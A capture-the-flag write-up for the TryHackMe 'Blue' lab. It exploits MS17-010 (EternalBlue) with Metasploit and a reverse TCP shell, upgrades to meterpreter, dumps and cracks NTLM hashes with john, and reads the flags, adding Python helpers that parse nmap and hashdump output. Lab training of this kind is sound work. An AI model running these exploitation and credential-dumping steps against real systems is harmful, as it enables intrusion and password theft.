Blue
Room Link: https://tryhackme.com/room/blue
Badges: https://tryhackme.com/ZishanAdThandar/badges/blue
Tools
- NMap https://nmap.org/download
- Metasploit https://www.metasploit.com/download
Recon
- Scan with nmap using the command nmap 10.10.248.180 --script vuln -p0-1000
Output:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-27 10:57 IST
Nmap scan report for 10.10.248.180
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: ERROR: Script execution failed (use -d to debug)
|_smb-double-pulsar-backdoor: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-conficker: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-cve-2017-7494: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms07-029: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms08-067: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms17-010: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 34.07 seconds
- Question: How many ports are open with a port number under 1000? Answer: 3
- Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067) Answer: ms17-010
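The first question is answered by reading the scan table, but the same output is worth parsing mechanically, and the scan above also carries a caveat: every smb-vuln-* script ended in "ERROR", so the scan itself neither confirms nor rules out MS17-010 (only ms10-054 produced a real verdict). The following Python is an added example, not part of this writeup or of nmap; it parses nmap's normal-format text (an excerpt of the scan above, embedded inline), counts open ports under 1000, checks that the shown and "Not shown" ports add up to the requested -p0-1000 range, and classifies each vulnerability script result as vulnerable, not vulnerable or inconclusive. Function names are my own.

```python
import re

# Excerpt of the scan text from the writeup, embedded so the script runs offline.
SCAN_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-27 10:57 IST
Nmap scan report for 10.10.248.180
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_smb-vuln-ms08-067: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms17-010: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 34.07 seconds
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
SCRIPT_LINE = re.compile(r"^\|[_ ]([\w.-]+):\s*(.*)$")  # first line of a script result
NOT_SHOWN = re.compile(r"^Not shown: (\d+) (\S+) ports")


def parse_nmap(text):
    """Return (ports, host_scripts, not_shown) parsed from nmap normal-format output."""
    ports, host_scripts, not_shown = [], {}, 0
    current, last, in_host = None, None, False
    for line in text.splitlines():
        m = NOT_SHOWN.match(line)
        if m:
            not_shown = int(m.group(1))
            continue
        m = PORT_LINE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4), "scripts": {}}
            ports.append(current)
            last = None
            continue
        if line.startswith("Host script results"):
            in_host, current, last = True, None, None
            continue
        m = SCRIPT_LINE.match(line)
        if m:
            target = host_scripts if in_host or current is None else current["scripts"]
            target[m.group(1)] = m.group(2)
            last = (target, m.group(1))
        elif line.startswith("|") and last:
            # Continuation of a multi-line script result (e.g. a VULNERABLE block).
            target, name = last
            target[name] = (target[name] + " " + line.lstrip("|_ ").strip()).strip()
    return ports, host_scripts, not_shown


def open_ports_below(ports, limit=1000):
    """Open port numbers strictly below `limit` (the room's first question)."""
    return sorted(p["port"] for p in ports if p["state"] == "open" and p["port"] < limit)


def port_count_is_consistent(ports, not_shown, first=0, last=1000):
    """Shown ports plus 'Not shown' ports must equal the size of the scanned range."""
    return len(ports) + not_shown == last - first + 1


def vuln_verdicts(host_scripts):
    """Classify smb-vuln-* results; an ERROR line proves nothing either way."""
    verdicts = {}
    for name, result in host_scripts.items():
        if not name.startswith("smb-vuln-"):
            continue
        upper = result.upper()
        if upper.startswith("ERROR"):
            verdicts[name] = "inconclusive"
        elif "NOT VULNERABLE" in upper or upper.startswith("FALSE"):
            verdicts[name] = "not vulnerable"
        elif "VULNERABLE" in upper:
            verdicts[name] = "vulnerable"
        else:
            verdicts[name] = "unknown"
    return verdicts


if __name__ == "__main__":
    ports, host_scripts, not_shown = parse_nmap(SCAN_OUTPUT)
    print("open ports under 1000:", open_ports_below(ports))
    print("count consistent with -p0-1000:", port_count_is_consistent(ports, not_shown))
    for name, verdict in vuln_verdicts(host_scripts).items():
        print(f"{name}: {verdict}")
```

On this scan the parser reports three open ports (135, 139, 445), confirms that 3 + 998 covers all 1001 ports of -p0-1000, and marks smb-vuln-ms17-010 as inconclusive. That is the practical lesson: an errored script is not a negative result, so either rerun the script with -d to see why it failed or confirm with a dedicated check such as the auxiliary/scanner/smb/smb_ms17_010 module listed later in this writeup.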
Gain Access
- Start Metasploit with msfconsole
- For the next question, we searched for the exploit in the Metasploit console with the search ms17-010 command. Output:
Matching Modules
================
   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
- Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........) Answer: exploit/windows/smb/ms17_010_eternalblue
- To use the exploit we typed the use exploit/windows/smb/ms17_010_eternalblue command.
- After checking the options with the options command, we found that we need to set RHOSTS with set rhosts 10.10.248.180 and LHOST with set lhost tun0.
- Question: Show options and set the one required value. What is the name of this value? (All caps for submission) Answer: RHOSTS
Escalate
- Set the payload with the command set payload windows/x64/shell/reverse_tcp
- Then run and wait for some time.
- search shell_to_meterpreter finds the module that upgrades the session to meterpreter. Output:
Matching Modules
================
   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter
- Question: If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected) Answer: post/multi/manage/shell_to_meterpreter
- Question: Select this (use MODULE_PATH). Show options, what option are we required to change? Answer: SESSION
- Run the module after setting session. If it fails, run it again; it will connect.
meterpreter > shell
Process 808 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>ps
ps
'ps' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>exit
exit
meterpreter > ps
Process List
============
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System             x64   0
 416   4     smss.exe           x64   0        NT AUTHORITY\SYSTEM  ...........
...............................................................................
...............................................................................
- Use migrate PROCESS_ID to migrate into one of the listed processes.
Cracking
- Use hashdump to dump the hashes. Output:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
- Question: Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? Answer: Jon
- Save the hashes in a file named hash.txt and use john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt to crack the hash.
- Question: Copy this password hash to a file and research how to crack it. What is the cracked password? Answer: *******
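The hashdump lines above are in pwdump format (user:RID:LM hash:NT hash:::), and they say more than just "the non-default user is Jon". The LM field on every account is aad3b435b51404eeaad3b435b51404ee, the well-known value for "no LM hash stored" (the NoLMHash policy, on by default since Windows Vista), and the NT field on Administrator and Guest is 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of the empty string, which means a blank password (on this box those two accounts are the ones to check for being disabled). The following Python is an added example, not part of this writeup, Metasploit or John the Ripper; it parses pwdump lines (the three from the page, embedded inline), separates built-in RIDs (below 1000) from created users, flags blank-password accounts, and produces the user:hash lines that are actually worth feeding to john --format=NT. Function names are my own.

```python
# Well-known constants: the "no LM hash stored" value and the NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# The hashdump output shown in the writeup, embedded so the audit runs offline.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""


def parse_hashdump(text):
    """Parse pwdump-format lines into dicts with the audit facts we care about."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"hash fields must be 32 hex chars: {line!r}")
        entries.append({
            "user": user,
            "rid": rid,
            "lm": lm,
            "nt": nt,
            "builtin": rid < 1000,            # RIDs below 1000 are reserved for built-in accounts
            "lm_stored": lm != EMPTY_LM,      # True would mean legacy LM hashes are kept
            "blank_password": nt == EMPTY_NT,  # NT hash of the empty string
        })
    return entries


def non_default_users(entries):
    """Accounts created on the machine rather than built in (the room's question)."""
    return [e["user"] for e in entries if not e["builtin"]]


def blank_password_accounts(entries):
    """Accounts whose NT hash is the hash of an empty password; verify they are disabled."""
    return [e["user"] for e in entries if e["blank_password"]]


def john_nt_targets(entries):
    """user:NThash lines for john --format=NT; blank hashes are skipped as pointless."""
    return [f"{e['user']}:{e['nt']}" for e in entries if not e["blank_password"]]


if __name__ == "__main__":
    entries = parse_hashdump(HASHDUMP)
    print("non-default users:", non_default_users(entries))
    print("blank-password accounts:", blank_password_accounts(entries))
    print("LM hashes stored:", any(e["lm_stored"] for e in entries))
    print("hash.txt contents:")
    print("\n".join(john_nt_targets(entries)))
```

For the page's dump this yields Jon as the only non-default user, Administrator and Guest as blank-password accounts, no stored LM hashes, and a single line Jon:ffb43f0de35be4d9917ac0cc8ad57f8d to place in hash.txt. From the defensive side the same three checks (created accounts, blank NT hashes, LM storage) are what an administrator should be auditing on their own SAM before an attacker does it for them.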
Find flags
- We can go to C:\\ and get the first flag using cat flag1.txt.
meterpreter > pwd
C:\Windows\system32
meterpreter > cd C:\\
meterpreter > ls
Listing: C:\
============
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  0      dir   2018-12-13 08:43:36 +0530  $Recycle.Bin
040777/rwxrwxrwx  0      dir   2009-07-14 10:38:56 +0530  Documents and Settings
040777/rwxrwxrwx  0      dir   2009-07-14 08:50:08 +0530  PerfLogs
040555/r-xr-xr-x  4096   dir   2019-03-18 03:52:01 +0530  Program Files
040555/r-xr-xr-x  4096   dir   2019-03-18 03:58:38 +0530  Program Files (x86)
040777/rwxrwxrwx  4096   dir   2019-03-18 04:05:57 +0530  ProgramData
040777/rwxrwxrwx  0      dir   2018-12-13 08:43:22 +0530  Recovery
040777/rwxrwxrwx  4096   dir   2019-03-18 04:05:55 +0530  System Volume Information
040555/r-xr-xr-x  4096   dir   2018-12-13 08:43:28 +0530  Users
040777/rwxrwxrwx  16384  dir   2019-03-18 04:06:30 +0530  Windows
100666/rw-rw-rw-  24     fil   2019-03-18 00:57:21 +0530  flag1.txt
000000/---------  0      fif   1970-01-01 05:30:00 +0530  hiberfil.sys
000000/---------  0      fif   1970-01-01 05:30:00 +0530  pagefile.sys
meterpreter > cat flag1.txt
flag{********************************}
- We can use search -f flag2.txt and search -f flag3.txt to find the second and third flags to submit, as we already know the first one. Note that cat on the unquoted path fails because meterpreter treats the backslashes as escape characters, so quote the path.
meterpreter > search -f flag2.txt
Found 1 result...
=================
Path                                  Size (bytes)  Modified (UTC)
----                                  ------------  --------------
c:\Windows\System32\config\flag2.txt  34            2019-03-18 01:02:48 +0530
meterpreter > cat c:\Windows\System32\config\flag2.txt
[-] stdapi_fs_stat: Operation failed: The system cannot find the file specified.
meterpreter > cat "c:\Windows\System32\config\flag2.txt"
flag{********************************s}
meterpreter > search -f flag3.txt
Found 1 result...
=================
Path                              Size (bytes)  Modified (UTC)
----                              ------------  --------------
c:\Users\Jon\Documents\flag3.txt  37            2019-03-18 00:56:36 +0530
meterpreter > cat "c:\Users\Jon\Documents\flag3.txt"
flag{********************************}
- flag1 : flag{********************************}
- flag2 : flag{********************************}
- flag3 : flag{********************************}
Author: Zishan Ahamed Thandar